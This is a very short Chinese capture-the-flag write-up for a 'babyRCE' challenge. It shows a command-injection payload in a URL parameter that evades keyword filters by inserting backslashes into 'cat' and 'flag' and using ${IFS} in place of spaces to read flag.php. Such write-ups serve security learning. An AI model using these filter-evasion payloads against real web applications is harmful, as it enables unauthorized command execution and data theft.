babyRCE

发现题目没有禁用ls，传个?rce=ls，发现有一个flag.php,用\绕过cat和flag的检测，用 ${IFS}代替空格

?rce=c\at${IFS}fl\ag.php

发现Flag在源码中